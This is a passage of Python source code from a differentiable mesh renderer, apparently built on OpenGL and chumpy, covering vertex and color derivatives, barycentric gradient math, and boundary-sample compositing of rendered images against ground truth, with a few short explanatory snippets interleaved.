view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))), np.float32))
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, np.dot(self.projectionMatrix, view_mtx))
GL.glDisable(GL.GL_DEPTH_TEST)
GL.glDrawElements(primtype, len(self.vbo_indices_dyn), GL.GL_UNSIGNED_INT, None)
GL.glEnable(GL.GL_DEPTH_TEST)
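`draw_colored_primitives_ms` accepts `fc` either with one row per face-vertex or with one row per face; in the latter case each row is repeated once per vertex of its face. A small sketch of that expansion (illustrative data only):

```python
import numpy as np

# One RGB color per face, two triangles over four vertices.
fc = np.array([[255, 0, 0],
               [0, 255, 0]], dtype=np.uint8)
f = np.array([[0, 1, 2],
              [2, 1, 3]])

# Repeat each face color once per vertex slot of that face.
vc_by_face = np.repeat(fc, f.shape[1], axis=0)
```

`vc_by_face` then has `f.size` rows, matching the flattened `verts_by_face` array uploaded to the VBO.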
def compute_dr_wrt(self, wrt):
visibility = self.visibility_image
if wrt is self.camera:
derivatives_verts = self.get_derivatives_verts()
return derivatives_verts
elif wrt is self.vc:
derivatives_vc = self.get_derivatives_vc()
return derivatives_vc
# Not working atm.:
elif wrt is self.bgcolor:
return 2. * (self.imageGT.r - self.render_image).ravel() * common.dr_wrt_bgcolor(visibility, self.frustum, num_channels=self.num_channels)
# Not working atm.:
elif wrt is self.texture_stack:
IS = np.nonzero(self.visibility_image.ravel() != 4294967295)[0]
texcoords, texidx = self.texcoord_image_quantized
vis_texidx = texidx.ravel()[IS]
vis_texcoords = texcoords.ravel()[IS]
JS = vis_texcoords * np.tile(col(vis_texidx), [1, 2]).ravel()
clr_im = -2. * (self.imageGT.r - self.render_image) * self.renderWithoutTexture
if False:
cv2.imshow('clr_im', clr_im)
# cv2.imshow('texmap', self.texture_image.r)
cv2.waitKey(1)
r = clr_im[:, :, 0].ravel()[IS]
g = clr_im[:, :, 1].ravel()[IS]
b = clr_im[:, :, 2].ravel()[IS]
data = np.concatenate((r, g, b))
IS = np.concatenate((IS * 3, IS * 3 + 1, IS * 3 + 2))
JS = np.concatenate((JS * 3, JS * 3 + 1, JS * 3 + 2))
return sp.csc_matrix((data, (IS, JS)), shape=(self.r.size, wrt.r.size))
return None
def compute_r(self):
return self.render()
@depends_on(dterms + terms)
def renderWithoutColor(self):
self._call_on_changed()
return self.render_nocolor
@depends_on(dterms + terms)
def renderWithoutTexture(self):
self._call_on_changed()
return self.render_notexture
# @depends_on(dterms+terms)
def render(self):
self._call_on_changed()
visibility = self.visibility_image
visible = np.nonzero(visibility.ravel() != 4294967295)[0]  # 4294967295 == 2**32 - 1 marks pixels with no visible face
if self.updateRender:
render, residuals = self.compute_image(visible, visibility, self.f)
self.render_result = render
self.residuals_result = residuals
self.updateRender = False
if self.imageGT is None:
returnResult = self.render_result
else:
returnResult = self.residuals_result
return returnResult
def get_derivatives_verts(self):
self._call_on_changed()
visibility = self.visibility_image
color = self.render_resolved
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
barycentric = self.barycentric_image
if self.updateDerivatives_verts:
if self.updateRender:
self.render()
derivatives_verts = self.compute_derivatives_verts(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'],
self.v.r.size // 3, self.f)
self.derivatives_verts = derivatives_verts
self.updateDerivatives_verts = False
return self.derivatives_verts
def get_derivatives_vc(self):
self._call_on_changed()
visibility = self.visibility_image
color = self.render_resolved
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
barycentric = self.barycentric_image
if self.updateDerivatives_vc:
if self.updateRender:
self.render()
derivatives_vc = self.compute_derivatives_vc(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'],
self.v.r.size // 3, self.f)
self.derivatives_vc = derivatives_vc
self.updateDerivatives_vc = False
return self.derivatives_vc
# # @depends_on(dterms+terms)
# def image_and_derivatives(self):
# # self._call_on_changed()
# visibility = self.visibility_image
#
# color = self.render_resolved
#
# visible = np.nonzero(visibility.ravel() != 4294967295)[0]
# num_visible = len(visible)
#
# barycentric = self.barycentric_image
#
# if self.updateRender:
# render, derivatives = self.compute_image_and_derivatives(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size / 3, self.f)
# self.render = render
# self.derivatives = derivatives
# self.updateRender = False
#
# return self.render, self.derivatives
#
def barycentricDerivatives(self, vertices, faces, verts):
import chumpy as ch
vertices = np.concatenate([vertices, np.ones([vertices.size // 3, 1])], axis=1)
view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
verts_hom = np.concatenate([verts.reshape([-1, 3]), np.ones([verts.size // 3, 1])], axis=1)
# viewVerts = negYMat.dot(view_mtx.dot(verts_hom.T).T[:, :3].T).T.reshape([-1, 3])
projVerts = (camMtx.dot(view_mtx)).dot(verts_hom.T).T[:, :3].reshape([-1, 3])
viewVerticesNonBnd = camMtx[0:3, 0:3].dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
# # # Check with autodiff:
# #
# view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
# # negYMat = ch.array([[1,0,self.camera.c.r[0]],[0,-1,self.camera.c.r[1]],[0,0,1]])
# verts_hom_ch = ch.Ch(verts_hom)
# camMtx = ch.Ch(np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])])
# projVerts = (camMtx.dot(view_mtx)).dot(verts_hom_ch.T).T[:, :3].reshape([-1, 3])
# viewVerts = ch.Ch(np.array(projVerts))
# projVerts = projVerts[:, :2] / projVerts[:, 2:3]
#
# chViewVerticesNonBnd = camMtx[0:3, 0:3].dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
# p0 = ch.Ch(viewVerticesNonBnd[:, 0, :])
# chp0 = p0
#
# p1 = ch.Ch(viewVerticesNonBnd[:, 1, :])
# chp1 = p1
#
# p2 = ch.Ch(viewVerticesNonBnd[:, 2, :])
# chp2 = p2
#
# # D = np.linalg.det(np.concatenate([(p3 - p1).reshape([nNonBndFaces, 1, 3]), (p1 - p2).reshape([nNonBndFaces, 1, 3])], axis=1))
# nt = ch.cross(p1 - p0, p2 - p0)
# chnt = nt
# A = 0.5 * ch.sqrt(ch.sum(nt ** 2, axis=1))
# chnt_norm = nt / ch.sqrt(ch.sum(nt ** 2, axis=1))[:, None]
# # nt = nt / A
#
# chb0part2 = ch.sum(ch.cross(chnt_norm, p2 - p1) * (viewVerts - p1), axis=1)
# chb0 = 0.5 * ch.sum(ch.cross(chnt_norm, p2 - p1) * (viewVerts - p1), axis=1) / A
# chb1part2 = ch.sum(ch.cross(chnt_norm, p0 - p2) * (viewVerts - p2), axis=1)
# chb1 = 0.5 * ch.sum(ch.cross(chnt_norm, p0 - p2) * (viewVerts - p2), axis=1) / A
# chb2part2 = ch.sum(ch.cross(chnt_norm, p1 - p0) * (viewVerts - p0), axis=1)
# chb2 = 0.5 * ch.sum(ch.cross(chnt_norm, p1 - p0) * (viewVerts - p0), axis=1) / A
#
# drb0p0 = chb0.dr_wrt(p0)
# drb0p1 = chb0.dr_wrt(p1)
# drb0p2 = chb0.dr_wrt(p2)
#
# drb1p0 = chb1.dr_wrt(p0)
# drb1p1 = chb1.dr_wrt(p1)
# drb1p2 = chb1.dr_wrt(p2)
#
# drb2p0 = chb2.dr_wrt(p0)
# drb2p1 = chb2.dr_wrt(p1)
# drb2p2 = chb2.dr_wrt(p2)
#
# rows = np.tile(np.arange(drb0p0.shape[0])[None, :], [3, 1]).T.ravel()
# cols = np.arange(drb0p0.shape[0] * 3)
#
# drb0p0 = np.array(drb0p0[rows, cols]).reshape([-1, 3])
# drb0p1 = np.array(drb0p1[rows, cols]).reshape([-1, 3])
# drb0p2 = np.array(drb0p2[rows, cols]).reshape([-1, 3])
# drb1p0 = np.array(drb1p0[rows, cols]).reshape([-1, 3])
# drb1p1 = np.array(drb1p1[rows, cols]).reshape([-1, 3])
# drb1p2 = np.array(drb1p2[rows, cols]).reshape([-1, 3])
# drb2p0 = np.array(drb2p0[rows, cols]).reshape([-1, 3])
# drb2p1 = np.array(drb2p1[rows, cols]).reshape([-1, 3])
# drb2p2 = np.array(drb2p2[rows, cols]).reshape([-1, 3])
#
# chdp0 = np.concatenate([drb0p0[:, None, :], drb1p0[:, None, :], drb2p0[:, None, :]], axis=1)
# chdp1 = np.concatenate([drb0p1[:, None, :], drb1p1[:, None, :], drb2p1[:, None, :]], axis=1)
# chdp2 = np.concatenate([drb0p2[:, None, :], drb1p2[:, None, :], drb2p2[:, None, :]], axis=1)
#
# dp = np.concatenate([dp0[:, :, None], dp1[:, :, None], dp2[:, :, None]], 2)
# dp = dp[None, :]
view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
verts_hom = np.concatenate([verts.reshape([-1, 3]), np.ones([verts.size // 3, 1])], axis=1)
# viewVerts = negYMat.dot(view_mtx.dot(verts_hom.T).T[:, :3].T).T.reshape([-1, 3])
projVerts = (camMtx.dot(view_mtx)).dot(verts_hom.T).T[:, :3].reshape([-1, 3])
viewVerts = projVerts
projVerts = projVerts[:, :2] / projVerts[:, 2:3]
# viewVerticesNonBnd = negYMat.dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
p0 = viewVerticesNonBnd[:, 0, :]
p1 = viewVerticesNonBnd[:, 1, :]
p2 = viewVerticesNonBnd[:, 2, :]
p0_proj = p0[:, 0:2] / p0[:, 2:3]
p1_proj = p1[:, 0:2] / p1[:, 2:3]
p2_proj = p2[:, 0:2] / p2[:, 2:3]
# D = np.linalg.det(np.concatenate([(p3 - p1).reshape([nNonBndFaces, 1, 3]), (p1 - p2).reshape([nNonBndFaces, 1, 3])], axis=1))
nt = np.cross(p1 - p0, p2 - p0)
nt_norm = nt / np.linalg.norm(nt, axis=1)[:, None]
# a = -nt_norm[:, 0] / nt_norm[:, 2]
# b = -nt_norm[:, 1] / nt_norm[:, 2]
# c = np.sum(nt_norm * p0, 1) / nt_norm[:, 2]
cam_f = 1
u = p0[:, 0] / p0[:, 2]
v = p0[:, 1] / p0[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p0[:, 2][:, None], np.zeros([len(p0), 1]), (-p0[:, 0] / u ** 2)[:, None]]
xv = np.c_[np.zeros([len(p0), 1]), p0[:, 2][:, None], (-p0[:, 1] / v ** 2)[:, None]]
dxdp_0 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
u = p1[:, 0] / p1[:, 2]
v = p1[:, 1] / p1[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p1[:, 2][:, None], np.zeros([len(p1), 1]), (-p1[:, 0] / u ** 2)[:, None]]
xv = np.c_[np.zeros([len(p1), 1]), p1[:, 2][:, None], (-p1[:, 1] / v ** 2)[:, None]]
dxdp_1 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
u = p2[:, 0] / p2[:, 2]
v = p2[:, 1] / p2[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p2[:, 2][:, None], np.zeros([len(p2), 1]), (-p2[:, 0] / u ** 2)[:, None]]
xv = np.c_[np.zeros([len(p2), 1]), p2[:, 2][:, None], (-p2[:, 1] / v ** 2)[:, None]]
dxdp_2 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
# x = u * c / (cam_f - a * u - b * v)
# y = v*c/(cam_f - a*u - b*v)
# z = c*cam_f/(cam_f - a*u - b*v)
A = 0.5 * np.linalg.norm(np.cross(p1 - p0, p2 - p0), axis=1)
nt_mag = A * 2
# nt = nt / A
# db1 = 0.5*np.cross(nt_norm, p2-p1)/A[:, None]
# db2 = 0.5*np.cross(nt_norm, p0-p2)/A[:, None]
# db3_2 = 0.5*np.cross(nt_norm, p1-p0)/A[:, None]
# db3 = - db1 - db2
p = viewVerts
pre1 = -1 / (nt_mag[:, None] ** 2) * nt_norm
ident = np.identity(3)
ident = np.tile(ident[None, :], [len(p2), 1, 1])
dntdp0 = np.cross((p2 - p0)[:, None, :], -ident) + np.cross(-ident, (p1 - p0)[:, None, :])
dntdp1 = np.cross((p2 - p0)[:, None, :], ident)
dntdp2 = np.cross(ident, (p1 - p0)[:, None, :])
# Pol check this!:
dntnorm = (ident - np.einsum('ij,ik->ijk', nt_norm, nt_norm)) / nt_mag[:, None, None]
dntnormdp0 = np.einsum('ijk,ikl->ijl', dntnorm, dntdp0)
dntnormdp1 = np.einsum('ijk,ikl->ijl', dntnorm, dntdp1)
dntnormdp2 = np.einsum('ijk,ikl->ijl', dntnorm, dntdp2)
dpart1p0 = np.einsum('ij,ijk->ik', pre1, dntdp0)
dpart1p1 = np.einsum('ij,ijk->ik', pre1, dntdp1)
dpart1p2 = np.einsum('ij,ijk->ik', pre1, dntdp2)
b0 = np.sum(np.cross(nt_norm, p2 - p1) * (p - p1), axis=1)[:, None]
db0part2p0 = np.einsum('ikj,ij->ik', np.cross(dntnormdp0.swapaxes(1, 2), (p2 - p1)[:, None, :]), p - p1)
# db0part2p1 = np.einsum('ikj,ij->ik',np.cross((p2 - p1)[:, None, :], dntnormdp0), p - p1) + np.einsum('ikj,ij->ik', np.cross(-ident,nt_norm[:, None, :]), p - p1) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p2-p1),-ident)
# db0part2p1 = np.einsum('ikj,ij->ik',np.cross((p2 - p1)[:, None, :], dntnormdp0.swapaxes(1,2)), p - p1) + np.einsum('ikj,ij->ik', np.cross(-ident, nt_norm[:, None, :]), p - p1) + np.einsum('ik,ikj->ik', np.cross(p2-p1,nt_norm[:, :]),-ident)
db0part2p1 = np.einsum('ikj,ij->ik', np.cross(dntnormdp1.swapaxes(1, 2), (p2 - p1)[:, None, :]), p - p1) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], -ident), p - p1) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p2 - p1), -ident)
db0part2p2 = np.einsum('ikj,ij->ik', np.cross(dntnormdp2.swapaxes(1, 2), (p2 - p1)[:, None, :]), p - p1) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], ident), p - p1)
db0dp0wrtpart1 = dpart1p0 * b0
db0dp1wrtpart1 = dpart1p1 * b0
db0dp2wrtpart1 = dpart1p2 * b0
db0dp0wrtpart2 = 1. / (nt_mag[:, None]) * db0part2p0
db0dp1wrtpart2 = 1. / (nt_mag[:, None]) * db0part2p1
db0dp2wrtpart2 = 1. / (nt_mag[:, None]) * db0part2p2
db0dp0wrt = db0dp0wrtpart1 + db0dp0wrtpart2
db0dp1wrt = db0dp1wrtpart1 + db0dp1wrtpart2
db0dp2wrt = db0dp2wrtpart1 + db0dp2wrtpart2
######
b1 = np.sum(np.cross(nt_norm, p0 - p2) * (p - p2), axis=1)[:, None]
db1part2p0 = np.einsum('ikj,ij->ik', np.cross(dntnormdp0.swapaxes(1, 2), (p0 - p2)[:, None, :]), p - p2) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], ident), p - p2)
db1part2p1 = np.einsum('ikj,ij->ik', np.cross(dntnormdp1.swapaxes(1, 2), (p0 - p2)[:, None, :]), p - p2)
db1part2p2 = np.einsum('ikj,ij->ik', np.cross(dntnormdp2.swapaxes(1, 2), (p0 - p2)[:, None, :]), p - p2) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], -ident), p - p2) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p0 - p2), -ident)
db1dp0wrtpart1 = dpart1p0 * b1
db1dp1wrtpart1 = dpart1p1 * b1
db1dp2wrtpart1 = dpart1p2 * b1
db1dp0wrtpart2 = 1. / (nt_mag[:, None]) * db1part2p0
db1dp1wrtpart2 = 1. / (nt_mag[:, None]) * db1part2p1
db1dp2wrtpart2 = 1. / (nt_mag[:, None]) * db1part2p2
db1dp0wrt = db1dp0wrtpart1 + db1dp0wrtpart2
db1dp1wrt = db1dp1wrtpart1 + db1dp1wrtpart2
db1dp2wrt = db1dp2wrtpart1 + db1dp2wrtpart2
######
b2 = np.sum(np.cross(nt_norm, p1 - p0) * (p - p0), axis=1)[:, None]
db2part2p0 = np.einsum('ikj,ij->ik', np.cross(dntnormdp0.swapaxes(1, 2), (p1 - p0)[:, None, :]), p - p0) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], -ident), p - p0) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p1 - p0), -ident)
db2part2p1 = np.einsum('ikj,ij->ik', np.cross(dntnormdp1.swapaxes(1, 2), (p1 - p0)[:, None, :]), p - p0) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], ident), p - p0)
db2part2p2 = np.einsum('ikj,ij->ik', np.cross(dntnormdp2.swapaxes(1, 2), (p1 - p0)[:, None, :]), p - p0)
db2dp0wrtpart1 = dpart1p0 * b2
db2dp1wrtpart1 = dpart1p1 * b2
db2dp2wrtpart1 = dpart1p2 * b2
db2dp0wrtpart2 = 1. / (nt_mag[:, None]) * db2part2p0
db2dp1wrtpart2 = 1. / (nt_mag[:, None]) * db2part2p1
db2dp2wrtpart2 = 1. / (nt_mag[:, None]) * db2part2p2
db2dp0wrt = db2dp0wrtpart1 + db2dp0wrtpart2
db2dp1wrt = db2dp1wrtpart1 + db2dp1wrtpart2
db2dp2wrt = db2dp2wrtpart1 + db2dp2wrtpart2
dp0 = np.concatenate([db0dp0wrt[:, None, :], db1dp0wrt[:, None, :], db2dp0wrt[:, None, :]], axis=1)
dp1 = np.concatenate([db0dp1wrt[:, None, :], db1dp1wrt[:, None, :], db2dp1wrt[:, None, :]], axis=1)
dp2 = np.concatenate([db0dp2wrt[:, None, :], db1dp2wrt[:, None, :], db2dp2wrt[:, None, :]], axis=1)
#
dp = np.concatenate([dp0[:, :, None], dp1[:, :, None], dp2[:, :, None]], 2)
# If dealing with degenerate triangles, ignore that gradient.
# dp[nt_mag <= 1e-15] = 0
dp = dp[None, :]
nFaces = len(faces)
# visTriVC = self.vc.r[faces.ravel()].reshape([nFaces, 3, 3]).transpose([2, 0, 1])[:, :, :, None, None]
vc = self.vc.r[faces.ravel()].reshape([nFaces, 3, 3]).transpose([2, 0, 1])[:, :, :, None, None]
vc[vc > 1] = 1
vc[vc < 0] = 0
visTriVC = vc
dxdp = np.concatenate([dxdp_0[:, None, :], dxdp_1[:, None, :], dxdp_2[:, None, :]], axis=1)
dxdp = dxdp[None, :, None]
# dbvc = np.sum(dp * visTriVC, 2)
# dbvc = dp * visTriVC * t_area[None, :, None, None, None]
dbvc = dp * visTriVC
didp = np.sum(dbvc[:, :, :, :, :, None] * dxdp, 4).sum(2)
# output should be shape: VC x Ninput x Tri Points x UV
# drb0p0 # db0dp0wrt
# drb0p1 # db0dp1wrt
# drb0p2 # db0dp2wrt
# drb1p0 # db1dp0wrt
# drb1p1 # db1dp1wrt
# drb1p2 # db1dp2wrt
# drb2p0 # db2dp0wrt
# drb2p1 # db2dp1wrt
# drb2p2 # db2dp2wrt
return didp
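The derivatives above differentiate the normalized-cross-product form of the barycentric coordinates. As a sanity check on that form itself, here is a small numeric sketch of the same construction (`b0`, `b1`, `b2` as in `barycentricDerivatives`, on a hypothetical triangle):

```python
import numpy as np

# A right triangle in the plane z = 1 and a query point inside it.
p0 = np.array([0.0, 0.0, 1.0])
p1 = np.array([1.0, 0.0, 1.0])
p2 = np.array([0.0, 1.0, 1.0])
p = np.array([0.25, 0.25, 1.0])

nt = np.cross(p1 - p0, p2 - p0)  # face normal, |nt| = 2 * triangle area
nt_mag = np.linalg.norm(nt)
nt_norm = nt / nt_mag

# Barycentric coordinates from signed sub-areas, as in the code above.
b0 = np.dot(np.cross(nt_norm, p2 - p1), p - p1) / nt_mag
b1 = np.dot(np.cross(nt_norm, p0 - p2), p - p2) / nt_mag
b2 = np.dot(np.cross(nt_norm, p1 - p0), p - p0) / nt_mag
```

The three coordinates sum to one and reproduce `p` as `b0*p0 + b1*p1 + b2*p2`.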
def compute_image(self, visible, visibility, f):
"""Resolve the per-sample renders into the final color image and, when a
ground-truth image is available, the per-pixel squared residuals."""
boundaryImage = self.boundarybool_image.astype(bool) & (visibility != 4294967295)
zerosIm = np.ones(self.boundarybool_image.shape).astype(bool)
edge_visibility = self.boundaryid_image
nsamples = self.nsamples
if np.any(boundaryImage):
sampleV = self.renders_sample_pos.reshape([nsamples, -1, 2])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape(
[nsamples, -1, 2])
# sampleBarycentric = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:,(zerosIm*boundaryImage).ravel().astype(np.bool),:].reshape([nsamples, -1, 3])
sampleColors = self.renders.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([nsamples, -1, 3])
boundaryFaces = visibility[(boundaryImage) & (visibility != 4294967295)]
nBndFaces = len(boundaryFaces)
vertsProjBnd = self.camera.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]].ravel()].reshape([-1, 2, 2])
vertsProjBndSamples = np.tile(vertsProjBnd[None, :], [self.nsamples, 1, 1, 1])
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(bool)].reshape([nsamples, -1]) - 1
# if self.debug:
# import pdb; pdb.set_trace()
faces = f[sampleFaces].ravel()
vertsPerFaceProjBnd = self.camera.r[faces].reshape([-1, 3, 2])
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:, 0, :], np.ones([nv, 1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:, 1, :], np.ones([nv, 1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:, 2, :], np.ones([nv, 1])]
t_area_bnd = np.abs(np.linalg.det(np.concatenate([p0_proj[:, None], p1_proj[:, None], p2_proj[:, None]], axis=1)) * 0.5)
t_area_bnd[t_area_bnd > 1] = 1
# Trick to cap to 1 while keeping gradients.
p1 = vertsProjBndSamples.reshape([-1,2,2])[:, 0, :]
p2 = vertsProjBndSamples.reshape([-1,2,2])[:, 1, :]
p = sampleV.reshape([-1,2])
l = (p2 - p1)
linedist = np.sqrt((np.sum(l ** 2, axis=1)))[:, None]
self.linedist = linedist
lnorm = l / linedist
self.lnorm = lnorm
v1 = p - p1
self.v1 = v1
d = v1[:, 0] * lnorm[:, 0] + v1[:, 1] * lnorm[:, 1]
self.d = d
intersectPoint = p1 + d[:, None] * lnorm
v2 = p - p2
self.v2 = v2
l12 = (p1 - p2)
linedist12 = np.sqrt((np.sum(l12 ** 2, axis=1)))[:, None]
lnorm12 = l12 / linedist12
d2 = v2[:, 0] * lnorm12[:, 0] + v2[:, 1] * lnorm12[:, 1]
nonIntersect = (d2 < 0) | (d < 0)
self.nonIntersect = nonIntersect
argminDistNonIntersect = np.argmin(np.c_[d[nonIntersect], d2[nonIntersect]], 1)
self.argminDistNonIntersect = argminDistNonIntersect
intersectPoint[nonIntersect] = vertsProjBndSamples.reshape([-1,2,2])[nonIntersect][np.arange(nonIntersect.sum()), argminDistNonIntersect]
lineToPoint = (p - intersectPoint)
n = lineToPoint
dist = np.sqrt((np.sum(lineToPoint ** 2, axis=1)))[:, None]
n_norm = lineToPoint / dist
self.n_norm = n_norm
self.dist = dist
d_final = dist.squeeze()
# max_nx_ny = np.maximum(np.abs(n_norm[:, 0]), np.abs(n_norm[:, 1]))
# d_final = d_final / max_nx_ny
# invViewMtx = np.linalg.inv(np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])])
# #
# camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
# # invCamMtx = np.r_[np.c_[np.linalg.inv(self.camera.camera_mtx), np.array([0,0,0])], np.array([[0, 0, 0, 1]])]
#
# view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
# verticesBndSamples = np.concatenate([verticesBndSamples.reshape([-1, 3]), np.ones([verticesBndSamples.size // 3, 1])], axis=1)
# projVerticesBndOutside = (camMtx.dot(view_mtx)).dot(verticesBndSamples.T).T[:, :3].reshape([-1, 2, 3])
# projVerticesBndDir = projVerticesBndOutside[:, 1, :] - projVerticesBndOutside[:, 0, :]
# projVerticesBndDir = projVerticesBndDir / np.sqrt((np.sum(projVerticesBndDir ** 2, 1)))[:, None]
# dproj = (intersectPoint[:, 0] * projVerticesBndOutside[:, 0, 2] - projVerticesBndOutside[:, 0, 0]) / (projVerticesBndDir[:, 0] - projVerticesBndDir[:, 2] * intersectPoint[:, 0])
# # Code to check computation that dproj == dprojy
# # dproj_y = (intersectPoint[:,1]* projVerticesBndOutside[:,0,2] - projVerticesBndOutside[:,0,1]) / (projVerticesBndDir[:,1] - projVerticesBndDir[:,2]*intersectPoint[:,1])
#
# projPoint = projVerticesBndOutside[:, 0, :][:, :] + dproj[:, None] * projVerticesBndDir[:, :]
#
# projPointVec4 = np.concatenate([projPoint, np.ones([projPoint.shape[0], 1])], axis=1)
# viewPointIntersect = (invViewMtx.dot(np.linalg.inv(camMtx)).dot(projPointVec4.T.reshape([4, -1])).reshape([4, -1])).T[:, :3]
#
# barycentricVertsDistIntesect = np.linalg.norm(viewPointIntersect - verticesBndSamples[:, 0:3].reshape([-1, 2, 3])[:, 0, :], axis=1)
# barycentricVertsDistIntesect2 = np.linalg.norm(viewPointIntersect - verticesBndSamples[:, 0:3].reshape([-1, 2, 3])[:, 1, :], axis=1)
# # Code to check barycentricVertsDistIntesect + barycentricVertsDistIntesect2 = barycentricVertsDistEdge
# barycentricVertsDistEdge = np.linalg.norm(
# verticesBndSamples[:, 0:3].reshape([-1, 2, 3])[:, 0, :] - verticesBndSamples[:, 0:3].reshape([-1, 2, 3])[:, 1, :], axis=1)
#
# nonIntersect = np.abs(barycentricVertsDistIntesect + barycentricVertsDistIntesect2 - barycentricVertsDistEdge) > 1e-4
# argminDistNonIntersect = np.argmin(np.c_[barycentricVertsDistIntesect[nonIntersect], barycentricVertsDistIntesect2[nonIntersect]], 1)
#
# self.viewPointIntersect = viewPointIntersect
# self.viewPointIntersect[nonIntersect] = verticesBndSamples.reshape([-1, 2, 4])[nonIntersect, :, 0:3][np.arange(nonIntersect.sum()),
# argminDistNonIntersect, :]
d_finalNP = d_final.copy()
self.d_final = d_finalNP
self.t_area_bnd = t_area_bnd
areaWeights = t_area_bnd.reshape([nsamples, nBndFaces])
areaWeightsTotal = areaWeights.sum(0)
# areaWeightsTotal[areaWeightsTotal < 1] = 1
self.areaWeights = areaWeights
self.areaWeightsTotal = areaWeightsTotal
self.d_final_total = d_finalNP.reshape([self.nsamples, -1,1]).sum(0)
# if self.imageGT is not None:
finalColorBnd = sampleColors * d_finalNP.reshape([self.nsamples, -1,1]) / (self.d_final_total.reshape([1, -1,1]))
# finalColorBnd = areaWeights[:,:,None] * sampleColors * d_finalNP.reshape([self.nsamples, -1,1]) / (self.d_final_total.reshape([1, -1,1]) * areaWeightsTotal[None,:,None])
self.finalColorBnd = finalColorBnd
# else:
# finalColorBnd = sampleColors
bndColorsImage = np.zeros_like(self.color_image)
bndColorsImage[(zerosIm * boundaryImage), :] = np.sum(finalColorBnd, axis=0)
finalColorImageBnd = bndColorsImage
if self.imageGT is not None:
bndColorsResiduals = np.zeros_like(self.color_image)
self.sampleResiduals = (sampleColors - self.imageGT.r[(zerosIm * boundaryImage),:][None,:])
self.sampleResidualsWeighted = self.sampleResiduals**2 * d_finalNP.reshape([self.nsamples, -1,1]) / self.d_final_total.reshape([1, -1,1])
bndColorsResiduals[(zerosIm * boundaryImage), :] = np.sum(self.sampleResidualsWeighted,0)
if np.any(boundaryImage):
finalColor = (1 - boundaryImage)[:, :, None] * self.color_image + boundaryImage[:, :, None] * finalColorImageBnd
if self.imageGT is not None:
self.residuals = (self.color_image - self.imageGT.r)
errors = self.residuals**2
finalResidual = (1 - boundaryImage)[:, :, None] * errors + boundaryImage[:, :, None] * bndColorsResiduals
else:
finalColor = self.color_image
if self.imageGT is not None:
finalResidual = (self.color_image - self.imageGT.r)**2
if self.imageGT is None:
finalResidual = None
finalColor[finalColor > 1] = 1
finalColor[finalColor < 0] = 0
return finalColor, finalResidual
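The boundary weighting in `compute_image` measures each sample's distance to the occluding edge, snapping to the nearer endpoint when the foot of the perpendicular falls outside the segment. The same clamped point-to-segment distance can be sketched in isolation (hypothetical helper name):

```python
import numpy as np

def point_segment_distance(p, p1, p2):
    # Unit direction along each segment.
    l = p2 - p1
    lnorm = l / np.linalg.norm(l, axis=1, keepdims=True)
    # Signed projections of p measured from either endpoint.
    d = np.sum((p - p1) * lnorm, axis=1)
    lnorm12 = (p1 - p2) / np.linalg.norm(p1 - p2, axis=1, keepdims=True)
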